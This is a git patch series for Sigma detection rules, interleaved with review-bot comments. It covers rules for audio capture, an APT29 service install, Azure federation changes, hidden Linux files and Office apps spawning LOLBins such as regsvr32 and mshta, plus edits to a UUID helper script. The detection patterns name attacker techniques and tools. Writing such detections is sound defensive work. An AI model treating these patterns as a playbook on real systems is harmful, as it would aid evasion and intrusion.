From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Sun, 5 Sep 2021 09:28:53 +0200 Subject: [PATCH 0744/1367] Update lnx_auditd_audio_capture.yml Added more references about arecord. --- rules/linux/auditd/lnx_auditd_audio_capture.yml | 2 ++ 1 file changed, 2 insertions(+) 
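Review bot: The selection pins the full argument vector (`a0: arecord`, `a1: '-vv'`, `a2: '-fdat'`), so any invocation with a different verbosity flag, format or argument order is missed while the title promises to detect audio capture in general; unless those exact flags come from a specific tooling pattern, match on the binary alone, `a0: arecord`, and keep the condition as is. If the flags are deliberate, record the reason in a comment next to `a1`. The comment `#the actual binary that arecord is using and that has to be monitored is /usr/bin/aplay` sits between two top-level keys and reads as an unverified aside; either move the claim into the description with a reference or drop it. `falsepositives: - None` also differs from the `Unknown` wording used by the other rules in this series.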
diff --git a/rules/linux/auditd/lnx_auditd_audio_capture.yml b/rules/linux/auditd/lnx_auditd_audio_capture.yml index 3d3c5ccd..42246e7a 100644 --- a/rules/linux/auditd/lnx_auditd_audio_capture.yml +++ b/rules/linux/auditd/lnx_auditd_audio_capture.yml @@ -6,6 +6,8 @@ author: 'Pawel Mazur' status: experimental date: 2021/09/04 references: + - https://linux.die.net/man/1/arecord + - https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa - https://attack.mitre.org/techniques/T1123/ logsource: product: linux From acf2bfbd27a6c5fabc2348c73ead426c4e6f814e Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 5 Sep 2021 10:43:42 +0200 Subject: [PATCH 0745/1367] Update sigma_uuid verify Make a better verify code --- rules/windows/builtin/win_apt_apt29_tor.yml | 3 +- tools/sigma/sigma_uuid.py | 63 +++++++++++++-------- 2 files changed, 42 insertions(+), 24 deletions(-) diff --git a/rules/windows/builtin/win_apt_apt29_tor.yml b/rules/windows/builtin/win_apt_apt29_tor.yml index 8e4e79c8..aec2c262 100755 --- a/rules/windows/builtin/win_apt_apt29_tor.yml +++ b/rules/windows/builtin/win_apt_apt29_tor.yml @@ -1,6 +1,5 @@ action: global title: APT29 Google Update Service Install -id: c069f460-2b87-4010-8dcf-e45bab362624 description: This method detects malicious services mentioned in APT29 report by FireEye. The legitimate path for the Google update service is C:\Program Files (x86)\Google\Update\GoogleUpdate.exe so the service names and executable locations used by APT29 are specific enough to be detected in log files. references: @@ -13,6 +12,8 @@ tags: date: 2017/11/01 modified: 2020/08/23 author: Thomas Patzke +--- +id: c069f460-2b87-4010-8dcf-e45bab362624 logsource: product: windows service: system diff --git a/tools/sigma/sigma_uuid.py b/tools/sigma/sigma_uuid.py index b9b07f05..ce0f9ab6 100755 --- a/tools/sigma/sigma_uuid.py +++ b/tools/sigma/sigma_uuid.py 
@@ -1,10 +1,23 @@ #!/usr/bin/env python3 # Assign UUIDs to Sigma rules and verify UUID assignment for a Sigma rule repository +# Copyright 2016-2021 SigmaHQ + +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU Lesser General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. + +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Lesser General Public License for more details. +# You should have received a copy of the GNU Lesser General Public License +# along with this program. If not, see . from argparse import ArgumentParser from pathlib import Path from uuid import uuid4, UUID -import yaml +import ruamel.yaml from sigma.output import SigmaYAMLDumper @@ -15,7 +28,7 @@ def print_verbose(*arg, **kwarg): def yaml_preserve_order(self, dict_data): return self.represent_mapping("tag:yaml.org,2002:map", dict_data.items()) -def valid_rule(rule,i,path): +def valid_id(rule,i,path): try: UUID(rule["id"]) except ValueError: # id is not a valid UUID @@ -26,6 +39,22 @@ def valid_rule(rule,i,path): return False return True +def is_global(rule): + if 'action' in rule: + if rule['action'] == 'global': + return True + return False + +def is_id_uuid(rule): + if 'id' in rule: + try: + UUID(rule["id"]) + except ValueError: + return False + return True + return False + + def main(): argparser = ArgumentParser(description="Assign and verify UUIDs of Sigma rules") argparser.add_argument("--verify", "-V", action="store_true", help="Verify existence and uniqueness of UUID assignments. Exits with error code if verification fails.") 
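Review bot: Replacing `import yaml` with `import ruamel.yaml` removes the `yaml` name from the module, but `from sigma.output import SigmaYAMLDumper` stays, and the assignment branch of `main()` (the `else:` with `newrules` at the end of the last hunk, whose body is outside this view) presumably still serialises through `yaml` with that dumper; if so, the non-verify path now raises `NameError`, so either keep `import yaml` or port that branch to ruamel too. `is_id_uuid`, added in the third hunk, is not referenced by any visible change; if nothing else calls it, drop it or use it in place of the `'id' in rule` test in `main()`. `is_global` can be shortened to `return rule.get('action') == 'global'`.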
@@ -43,36 +72,24 @@ def main(): else: paths = [ Path(pathname) for pathname in args.inputs ] - yaml.add_representer(dict, yaml_preserve_order) - uuids = set() passed = True for path in paths: print_verbose("Rule {}".format(str(path))) with path.open("r",encoding="UTF-8") as f: - rules = list(yaml.safe_load_all(f)) - - nb_rule = len(rules) + rules = list(ruamel.yaml.load_all(f,Loader=ruamel.yaml.RoundTripLoader)) + if args.verify: - if nb_rule == 1: - if not valid_rule(rules[0],1,path): passed = False - else: - if rules[0]["action"] == "global": - for i in range(1,nb_rule): - if not valid_rule(rules[i],i,path): passed = False - ''' + i = 0 for rule in rules: - - if "title" in rule: # Rule with a title should also have a UUID - try: - UUID(rule["id"]) - except ValueError: # id is not a valid UUID - print("Rule {} in file {} has a malformed UUID '{}'.".format(i, str(path), rule["id"])) + if is_global(rule): # No id in global section + if 'id' in rule: passed = False - except KeyError: # rule has no id - print("Rule {} in file {} has no UUID.".format(i, str(path))) + print("Rule {} in file {} has ID in global section.".format(i,str(path))) + else: + if not valid_id(rule,i,path): passed = False - ''' + i += 1 else: newrules = list() changed = False From ca4c156fa4ce0c3ae6b2c14c014ee7aa3c7a1841 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 5 Sep 2021 11:20:57 +0200 Subject: [PATCH 0746/1367] Update win_apt_apt29_tor.yml --- rules/windows/builtin/win_apt_apt29_tor.yml | 30 ++++++++++++--------- 1 file changed, 17 insertions(+), 13 deletions(-) diff --git a/rules/windows/builtin/win_apt_apt29_tor.yml b/rules/windows/builtin/win_apt_apt29_tor.yml index aec2c262..65b7b8f3 100755 --- a/rules/windows/builtin/win_apt_apt29_tor.yml +++ b/rules/windows/builtin/win_apt_apt29_tor.yml 
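Review bot: The manual counter `i = 0` / `i += 1` around `for rule in rules:` is the idiomatic `for i, rule in enumerate(rules):`, which also cannot be skipped by a later `continue`. `ruamel.yaml.load_all(f, Loader=ruamel.yaml.RoundTripLoader)` uses the module-level functional API that newer ruamel.yaml releases deprecate in favour of the instance API, `ruamel.yaml.YAML(typ='rt').load_all(f)`; switching now avoids a break on upgrade. The rule numbering in the messages also changes from 1-based (`valid_rule(rules[0],1,path)` in the removed code) to 0-based, which `valid_id` will print; either start the counter at 1 or say in the message that the index is zero-based.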
@@ -10,9 +10,23 @@ tags: - attack.t1050 # an old one - attack.t1543.003 date: 2017/11/01 -modified: 2020/08/23 -author: Thomas Patzke +modified: 2020/09/05 +author: Thomas Patzke , frack113 (reorder file) --- +#First detection is only need to the near so level is informational to not trigger an alert +id: d1478dc2-fd6a-4154-a8fb-ba9a88a366e5 +logsource: + category: process_creation + product: windows +detection: + process: + Image: + - 'C:\Program Files(x86)\Google\GoogleService.exe' + - 'C:\Program Files(x86)\Google\GoogleUpdate.exe' + condition: process +level: informational +--- +action: repeat id: c069f460-2b87-4010-8dcf-e45bab362624 logsource: product: windows @@ -26,17 +40,7 @@ detection: falsepositives: - Unknown level: high ---- -id: d1478dc2-fd6a-4154-a8fb-ba9a88a366e5 -logsource: - category: process_creation - product: windows -detection: - process: - Image: - - 'C:\Program Files(x86)\Google\GoogleService.exe' - - 'C:\Program Files(x86)\Google\GoogleUpdate.exe' fields: - ComputerName - User - - CommandLine + - CommandLine \ No newline at end of file From b0964250b1142c9e6613560b3d01035b00449b5a Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 5 Sep 2021 12:23:45 +0200 Subject: [PATCH 0747/1367] Update win_apt_apt29_tor.yml --- rules/windows/builtin/win_apt_apt29_tor.yml | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/rules/windows/builtin/win_apt_apt29_tor.yml b/rules/windows/builtin/win_apt_apt29_tor.yml index 65b7b8f3..562bec73 100755 --- a/rules/windows/builtin/win_apt_apt29_tor.yml +++ b/rules/windows/builtin/win_apt_apt29_tor.yml @@ -12,9 +12,6 @@ tags: date: 2017/11/01 modified: 2020/09/05 author: Thomas Patzke , frack113 (reorder file) ---- -#First detection is only need to the near so level is informational to not trigger an alert -id: d1478dc2-fd6a-4154-a8fb-ba9a88a366e5 logsource: category: process_creation product: windows 
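Review bot: `modified: 2020/09/05` is a year behind the commit date (Sun, 5 Sep 2021) and should read `modified: 2021/09/05`; the `(reorder file)` remark in `author:` belongs in the commit message rather than the author field. The second hunk also drops the trailing newline of `- CommandLine` (`\ No newline at end of file`), which PATCH 0748 has to restore. The new comment `#First detection is only need to the near so level is informational to not trigger an alert` is hard to parse; if the intent is that the first document only provides context for the second, `# First document is context only; level is informational so it does not alert on its own` says that.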
@@ -23,10 +20,9 @@ detection: Image: - 'C:\Program Files(x86)\Google\GoogleService.exe' - 'C:\Program Files(x86)\Google\GoogleUpdate.exe' - condition: process +#First detection is only need to the near so level is informational to not trigger an alert level: informational --- -action: repeat id: c069f460-2b87-4010-8dcf-e45bab362624 logsource: product: windows From 44a5792be3e3261f23eb01cc5d7181d39dd7835a Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 5 Sep 2021 12:34:24 +0200 Subject: [PATCH 0748/1367] Revert win_apt_apt29_tor.yml --- rules/windows/builtin/win_apt_apt29_tor.yml | 32 +++++++++------------ 1 file changed, 13 insertions(+), 19 deletions(-) diff --git a/rules/windows/builtin/win_apt_apt29_tor.yml b/rules/windows/builtin/win_apt_apt29_tor.yml index 65b7b8f3..60622027 100755 --- a/rules/windows/builtin/win_apt_apt29_tor.yml +++ b/rules/windows/builtin/win_apt_apt29_tor.yml @@ -10,24 +10,8 @@ tags: - attack.t1050 # an old one - attack.t1543.003 date: 2017/11/01 -modified: 2020/09/05 -author: Thomas Patzke , frack113 (reorder file) ---- -#First detection is only need to the near so level is informational to not trigger an alert -id: d1478dc2-fd6a-4154-a8fb-ba9a88a366e5 -logsource: - category: process_creation - product: windows -detection: - process: - Image: - - 'C:\Program Files(x86)\Google\GoogleService.exe' - - 'C:\Program Files(x86)\Google\GoogleUpdate.exe' - condition: process -level: informational ---- -action: repeat -id: c069f460-2b87-4010-8dcf-e45bab362624 +modified: 2020/08/23 +author: Thomas Patzke logsource: product: windows service: system @@ -40,7 +24,17 @@ detection: falsepositives: - Unknown level: high +--- +id: c069f460-2b87-4010-8dcf-e45bab362624 +logsource: + category: process_creation + product: windows +detection: + process: + Image: + - 'C:\Program Files(x86)\Google\GoogleService.exe' + - 'C:\Program Files(x86)\Google\GoogleUpdate.exe' fields: - ComputerName - User - - CommandLine \ No newline at end of file + - CommandLine 
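Review bot: PATCH 0748 is titled as a revert but does not restore the pre-reorder file (its result is blob 60622027, not aec2c262): the `---` and `id: c069f460-2b87-4010-8dcf-e45bab362624` that stood between `author:` and `logsource: product: windows` before PATCH 0746 are not put back, so the header and the system-log detection now form one document, and the process_creation detection is re-added under `id: c069f460-…` although it carried `id: d1478dc2-fd6a-4154-a8fb-ba9a88a366e5` originally — one UUID disappears from the file and the other moves to a different detection. PATCH 0749 on the next line reaches the same state from the other base (blob 45af1e2d). A `git revert` of 0746/0747, or re-inserting `---` and `id: c069f460-…` after `author:` and putting `id: d1478dc2-…` back on the second document, would bring the file back. The first lines of the file (title and any `action: global`) lie outside these hunks, so whether the merged first document still carries an id of its own cannot be confirmed here.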
From c82a652a3462a95ad433d8d3dad6a0b809dfb73e Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 5 Sep 2021 12:37:30 +0200 Subject: [PATCH 0749/1367] Revert win_apt_apt29_tor.yml --- rules/windows/builtin/win_apt_apt29_tor.yml | 26 ++++++++++----------- 1 file changed, 12 insertions(+), 14 deletions(-) diff --git a/rules/windows/builtin/win_apt_apt29_tor.yml b/rules/windows/builtin/win_apt_apt29_tor.yml index 562bec73..45af1e2d 100755 --- a/rules/windows/builtin/win_apt_apt29_tor.yml +++ b/rules/windows/builtin/win_apt_apt29_tor.yml @@ -10,20 +10,8 @@ tags: - attack.t1050 # an old one - attack.t1543.003 date: 2017/11/01 -modified: 2020/09/05 -author: Thomas Patzke , frack113 (reorder file) -logsource: - category: process_creation - product: windows -detection: - process: - Image: - - 'C:\Program Files(x86)\Google\GoogleService.exe' - - 'C:\Program Files(x86)\Google\GoogleUpdate.exe' -#First detection is only need to the near so level is informational to not trigger an alert -level: informational ---- -id: c069f460-2b87-4010-8dcf-e45bab362624 +modified: 2020/08/23 +author: Thomas Patzke logsource: product: windows service: system @@ -36,6 +24,16 @@ detection: falsepositives: - Unknown level: high +--- +id: c069f460-2b87-4010-8dcf-e45bab362624 +logsource: + category: process_creation + product: windows +detection: + process: + Image: + - 'C:\Program Files(x86)\Google\GoogleService.exe' + - 'C:\Program Files(x86)\Google\GoogleUpdate.exe' fields: - ComputerName - User From dc88ad7c73a01280a0a9604e23fc238613cef6ee Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 5 Sep 2021 17:50:54 +0200 Subject: [PATCH 0750/1367] fix sigma_uuid assign id --- tools/sigma/sigma_uuid.py | 51 +++++++++++++++++---------------------- 1 file changed, 22 insertions(+), 29 deletions(-) diff --git a/tools/sigma/sigma_uuid.py b/tools/sigma/sigma_uuid.py index ce0f9ab6..4b9b7fc4 100755 
--- a/tools/sigma/sigma_uuid.py
+++ b/tools/sigma/sigma_uuid.py
@@ -18,15 +18,10 @@ from argparse import ArgumentParser
 from pathlib import Path
 from uuid import uuid4, UUID
 import ruamel.yaml
-from sigma.output import SigmaYAMLDumper
-
 def print_verbose(*arg, **kwarg):
 print(*arg, **kwarg)
-# Define order-preserving representer from dicts/maps
-def yaml_preserve_order(self, dict_data):
- return self.represent_mapping("tag:yaml.org,2002:map", dict_data.items())
 def valid_id(rule,i,path):
 try:
@@ -45,16 +40,6 @@ def is_global(rule):
 return True
 return False
-def is_id_uuid(rule):
- if 'id' in rule:
- try:
- UUID(rule["id"])
- except ValueError:
- return False
- return True
- return False
-
-
 def main():
 argparser = ArgumentParser(description="Assign and verify UUIDs of Sigma rules")
 argparser.add_argument("--verify", "-V", action="store_true", help="Verify existence and uniqueness of UUID assignments. Exits with error code if verification fails.")
@@ -72,7 +57,6 @@ def main():
 else:
 paths = [ Path(pathname) for pathname in args.inputs ]
- uuids = set()
 passed = True
 for path in paths:
 print_verbose("Rule {}".format(str(path)))
@@ -91,27 +75,36 @@ def main():
 passed = False
 i += 1
 else:
- newrules = list()
 changed = False
 i = 1
 for rule in rules:
- if "title" in rule and "id" not in rule: # only assign id to rules that have a title and no id
- newrule = dict()
- changed = True
- for k, v in rule.items():
- newrule[k] = v
- if k == "title": # insert id after title
- uuid = uuid4()
- newrule["id"] = str(uuid)
- print("Assigned UUID '{}' to rule {} in file {}.".format(uuid, i, str(path)))
- newrules.append(newrule)
+ if is_global(rule):
+ if 'id' in rule:
+ uuid = rule['id']
+ del rule['id']
+ print("Remove Global UUID '{}' to rule {} in file {}.".format(str(uuid), i, str(path)))
+ changed = True
 else:
- newrules.append(rule)
+ if 'id' in rule:
+ if not valid_id(rule,i,path):
+ uuid = uuid4()
+ rule['id'] = str(uuid)
+ changed = True
+ print("Change bad UUID '{}' to rule {} in file {}.".format(str(uuid), i, str(path)))
+ else:
+ pos= 1 if 'title' in rule else 0 #put id in after title is need
+ uuid = uuid4()
+ rule.insert(pos,"id",str(uuid))
+ changed = True
+ print("Assigned UUID '{}' to rule {} in file {}.".format(str(uuid), i, str(path)))
 i += 1
 if changed:
 with path.open("w") as f:
- yaml.dump_all(newrules, f, Dumper=SigmaYAMLDumper, indent=4, width=160, default_flow_style=False)
+ for rule in rules:
+ start= False if is_global(rule) else True
+ if len(rules) == 1: start= False # avoid --- if only one rule
+ ruamel.yaml.round_trip_dump(rule,stream=f,indent=4,block_seq_indent=4,explicit_start=start)
 if not passed:
 print("The Sigma rules listed above don't have an ID. The ID must be:")
From 6025df63ee197f3a23b071d3ba2d22a18f41d5bc Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Mon, 6 Sep 2021 11:06:58 -0500
Subject: [PATCH 0751/1367] Create azure_federation_modified.yml
---
 .../cloud/azure/azure_federation_modified.yml | 23 +++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 rules/cloud/azure/azure_federation_modified.yml
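Review bot: `with path.open("w") as f:` rewrites the rule with the platform default encoding, while the read side of main() (outside this hunk; it opened with `encoding="UTF-8"` in the earlier commit at L1179) decodes UTF-8, so a non-ASCII title or description can raise `UnicodeEncodeError` or be mis-encoded on Windows; `with path.open("w", encoding="UTF-8") as f:` matches the read. The message `Change bad UUID '{}' to rule {}` prints the freshly generated value, not the rejected one, so the log cannot be matched against the offending file; keep the old value in a local before overwriting and print both. `start= False if is_global(rule) else True` is `start = not is_global(rule)`, and `pos= 1 if 'title' in rule else 0` assumes `title` is the first key of the mapping, which the removed `newrule` loop did not assume — if that is intended, the comment should say `# id goes right after title, which is expected to be the first key`.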
diff --git a/rules/cloud/azure/azure_federation_modified.yml b/rules/cloud/azure/azure_federation_modified.yml
new file mode 100644
index 00000000..37b7f585
--- /dev/null
+++ b/rules/cloud/azure/azure_federation_modified.yml
@@ -0,0 +1,23 @@
+title: Azure Domain Federation Settings Modified
+id: 352a54e1-74ba-4929-9d47-8193d67aba1e
+description: Identifies when an user or application modified the federation settings on the domain.
+author: Austin Songer
+status: experimental
+date: 2021/09/06
+references:
+ - https://attack.mitre.org/techniques/T1078/
+logsource:
+ service: azure.activitylogs
+detection:
+ selection:
+ properties.message: Set federation settings on domain
+ condition: selection
+level: medium
+tags:
+ - attack.initial_access
+ - attack.t1078
+falsepositives:
+ - Federation Settings being modified or deleted may be performed by a system administrator.
+ - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+ - Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
+
From e6e3fc2eec44a2238ee5dfa7ebb01355f5a31dd8 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Mon, 6 Sep 2021 11:16:35 -0500
Subject: [PATCH 0752/1367] Update azure_federation_modified.yml
---
 rules/cloud/azure/azure_federation_modified.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/cloud/azure/azure_federation_modified.yml b/rules/cloud/azure/azure_federation_modified.yml
index 37b7f585..f5b0eee4 100644
--- a/rules/cloud/azure/azure_federation_modified.yml
+++ b/rules/cloud/azure/azure_federation_modified.yml
@@ -7,7 +7,7 @@ date: 2021/09/06
 references:
 - https://attack.mitre.org/techniques/T1078/
 logsource:
- service: azure.activitylogs
+ service: azure.signinlogs
 detection:
 selection:
 properties.message: Set federation settings on domain
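Review bot: `service: azure.signinlogs` (PATCH 0752) is unlikely to carry this event: 'Set federation settings on domain' is an Azure AD directory audit operation, whereas the sign-in logs hold authentication events, so the `properties.message` selection would not match there; the audit-log logsource the repository's other Azure AD audit rules use (`azure.auditlogs`, if the backend config defines it) is the one to point at. The ATT&CK mapping is loose as well: MITRE files federation and trust changes under T1484.002 (Domain Trust Modification), so `- attack.t1484.002` together with `attack.privilege_escalation` / `attack.defense_evasion` describes what the rule detects better than initial access via T1078 alone. The third `falsepositives` entry is investigation guidance rather than a benign source and reads better in `description`. The trailing blank line is only removed in PATCH 0753.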
From 0de95e355a41bfb2c8d96f77d7754a66f97cc302 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Mon, 6 Sep 2021 11:31:52 -0500
Subject: [PATCH 0753/1367] Update azure_federation_modified.yml
---
 rules/cloud/azure/azure_federation_modified.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/rules/cloud/azure/azure_federation_modified.yml b/rules/cloud/azure/azure_federation_modified.yml
index f5b0eee4..bc627c97 100644
--- a/rules/cloud/azure/azure_federation_modified.yml
+++ b/rules/cloud/azure/azure_federation_modified.yml
@@ -5,7 +5,7 @@ author: Austin Songer
 status: experimental
 date: 2021/09/06
 references:
- - https://attack.mitre.org/techniques/T1078/
+ - https://attack.mitre.org/techniques/T1078
 logsource:
 service: azure.signinlogs
 detection:
@@ -20,4 +20,4 @@ falsepositives:
 - Federation Settings being modified or deleted may be performed by a system administrator.
 - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
 - Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
-
+
From ef3efd8fd348596541124c444b80a463025d073b Mon Sep 17 00:00:00 2001
From: Pawel Mazur
Date: Mon, 6 Sep 2021 18:37:02 +0200
Subject: [PATCH 0754/1367] New Rule Linux - Hidden Files and Directories
---
 .../lnx_auditd_hidden_files_directories.yml | 31 +++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 rules/linux/auditd/lnx_auditd_hidden_files_directories.yml
diff --git a/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml b/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml
new file mode 100644
index 00000000..0f172ebb
--- /dev/null
+++ b/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml
@@ -0,0 +1,31 @@
+title: Hidden Files and Directoriese
+id: d08722cd-3d09-449a-80b4-83ea2d9d4616
+description: Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character
+author: 'Pawel Mazur'
+status: experimental
+date: 2021/09/06
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md
+ - https://attack.mitre.org/techniques/T1564/001/
+logsource:
+ product: linux
+ service: auditd
+detection:
+ commands:
+ type: EXECVE
+ a0:
+ - mkdir
+ - touch
+ - vim
+ - nano
+ - vi
+ arguments:
+ - a1|re: '\.(.*)'
+ - a2|re: '\.(.*)' #in case there are some other arguments being used in a1
+ condition: commands and arguments
+tags:
+ - attack.defenseevasion
+ - attack.t1564.001
+falsepositives:
+ - None
+level: low
\ No newline at end of file
From 9f5f25e480721b77497bb23b80a9bff58825d0a9 Mon Sep 17 00:00:00 2001
From: Pawel Mazur
Date: Mon, 6 Sep 2021 18:40:39 +0200
Subject: [PATCH 0755/1367] New Rule - Linux Hidden Files and Directories
---
 rules/linux/auditd/lnx_auditd_hidden_files_directories.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml b/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml
index 0f172ebb..af9b62e5 100644
--- a/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml
+++ b/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml
@@ -28,4 +28,4 @@ tags:
 - attack.t1564.001
 falsepositives:
 - None
-level: low
\ No newline at end of file
+level: low
From 7c2895c73fe7140ff94458a14137afc9560c083b Mon Sep 17 00:00:00 2001
From: Pawel Mazur
Date: Mon, 6 Sep 2021 18:43:49 +0200
Subject: [PATCH 0756/1367] New Rule - Linux Hidden Files and Directories
---
 rules/linux/auditd/lnx_auditd_hidden_files_directories.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
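Review bot: `a1|re: '\.(.*)'` (and `a2`) is a regex whose effect depends on the backend: where `|re` converts to an unanchored search it fires on any argument containing a dot — `touch notes.txt`, `vim main.py`, `mkdir build.d` — i.e. every file with an extension rather than a dotfile, and where the engine anchors the whole term it happens to work but offers no `^` anchor to make that explicit. The plain modifier states the intent without a regex and converts the same way on every backend: `- a1|startswith: '.'` and `- a2|startswith: '.'`. `falsepositives: - None` is not credible for this selection: `touch .bashrc`, `vim .vimrc` or `mkdir -p .config` are routine for users and provisioning tools and should be listed so the `low` level is understood. The title has a typo, `Directoriese`.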
diff --git a/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml b/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml
index af9b62e5..c36567a5 100644
--- a/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml
+++ b/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml
@@ -21,7 +21,7 @@ detection:
 - vi
 arguments:
 - a1|re: '\.(.*)'
- - a2|re: '\.(.*)' #in case there are some other arguments being used in a1
+ - a2|re: '\.(.*)' # in case there are some other arguments being used in a1
 condition: commands and arguments
 tags:
 - attack.defenseevasion
From e9fa5bde2be9f3d48eb4e3f7c86432f416b9f700 Mon Sep 17 00:00:00 2001
From: zakibro <48967550+zakibro@users.noreply.github.com>
Date: Mon, 6 Sep 2021 18:55:58 +0200
Subject: [PATCH 0757/1367] Update lnx_auditd_hidden_files_directories.yml Correction of tag
---
 rules/linux/auditd/lnx_auditd_hidden_files_directories.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml b/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml
index c36567a5..ec1dac52 100644
--- a/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml
+++ b/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml
@@ -24,7 +24,7 @@ detection:
 - a2|re: '\.(.*)' # in case there are some other arguments being used in a1
 condition: commands and arguments
 tags:
- - attack.defenseevasion
+ - attack.defense_evasion
 - attack.t1564.001
 falsepositives:
 - None
From 3b95b0c913289ecff773f52f15916d848dda1078 Mon Sep 17 00:00:00 2001
From: frack113 <62423083+frack113@users.noreply.github.com>
Date: Mon, 6 Sep 2021 20:56:41 +0200
Subject: [PATCH 0758/1367] Remove useless Eventid Use tools/config/generic/windows-audit.yml to convert for security 4688
---
 ...ocess_Creations_by_Office_applications.yml | 23 ++++++++-----------
 1 file changed, 10 insertions(+), 13 deletions(-)
diff --git a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml
index 009f56a8..287a7208 100644
--- a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml
+++ b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml
@@ -1,4 +1,5 @@
 title: Created Executables and Files by Office Applications
+id: a9505d16-644f-4f24-9002-7c322675e40d
 description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated.
 references:
 - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
@@ -11,29 +12,25 @@ tags:
 - attack.execution
 - attack.defence_evasion
 status: experimental
-Date: 2021/23/8
+Date: 2021/08/23
 logsource:
 product: Windows
- service: security
 category: process_creation
 detection:
 #useful_information: add more LOLBins to the rules logic of your choice.
 selection1:
- EventLog: security
- EventID: 4688
- selection2:
- NewProcessName|endswith:
+ Image|endswith:
 - 'regsvr32'
 - 'rundll32'
 - 'msiexec'
 - 'mshta'
 - 'verclsid'
- selection3:
- ParentProcessName|endswith:
- - winword.exe
- - excel.exe
- - powerpnt.exe
- condition: selection1 AND selection2 AND selection3
+ selection2:
+ ParentImage|endswith:
+ - winword.exe
+ - excel.exe
+ - powerpnt.exe
+ condition: selection1 AND selection2
 falsepositives:
-- Unknown
+ - Unknown
 level: high
From 9ef299c4f42a367062e64187640863eeed7520be Mon Sep 17 00:00:00 2001
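Review bot: `Image|endswith:` with `'regsvr32'`, `'rundll32'`, `'msiexec'`, `'mshta'`, `'verclsid'` cannot match a process-creation event, because the image path ends in `.exe` (compare the `ParentImage|endswith: - winword.exe` entries just below), so selection1 never matches and the rule is dead; the values need the `\name.exe` form, and the parent list likewise benefits from a leading `\` so `winword.exe` does not also match `notwinword.exe`. The sibling Wmiprvse rule rewritten in PATCH 0759 (L1191) has the same `.exe`-less `NewProcessName|endswith:` list. Several keys still do not match what the `windows-audit.yml` conversion named in the commit message keys on — `product: Windows` where the repository's logsources are lowercase `windows`, `Date:` where the schema field is `date`, `attack.defence_evasion` where the tag is `attack.defense_evasion` (as PATCH 0757 fixed for another rule), and `AND` in `condition:` where the rest of the repository writes `and` — hedged, since the converter's case handling is not visible here. The title, 'Created Executables and Files by Office Applications', describes a file-creation rule, not the LOLBin process creation this detection covers; `LOLBin Process Creation by Office Applications` would match the description.
```yaml
    selection1:
        Image|endswith:
            - '\regsvr32.exe'
            - '\rundll32.exe'
            - '\msiexec.exe'
            - '\mshta.exe'
            - '\verclsid.exe'
    # … unchanged: selection2 (ParentImage) and condition …
```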
From: frack113 <62423083+frack113@users.noreply.github.com>
Date: Mon, 6 Sep 2021 21:07:49 +0200
Subject: [PATCH 0759/1367] Change to LF
---
 ...creations_with_Wmiprvse_parent_process.yml | 74 +++++++-------
 ..._proxy executing_regsvr32_with_payload.yml | 94 +++++++++---------
 ...Applications_Spawning_WMI_command-line.yml | 72 +++++++-------
 ...mmand_execution_by_Office_Applications.yml | 64 ++++++------
 ...ice_applications_using_file_extentions.yml | 98 +++++++++----------
 ...ocess_Creations_by_Office_applications.yml | 74 +++++++-------
 ...creations_with_Wmiprvse_parent_process.yml | 70 ++++++-------
 ..._proxy_executing_regsvr32_with_payload.yml | 94 +++++++++---------
 8 files changed, 320 insertions(+), 320 deletions(-)
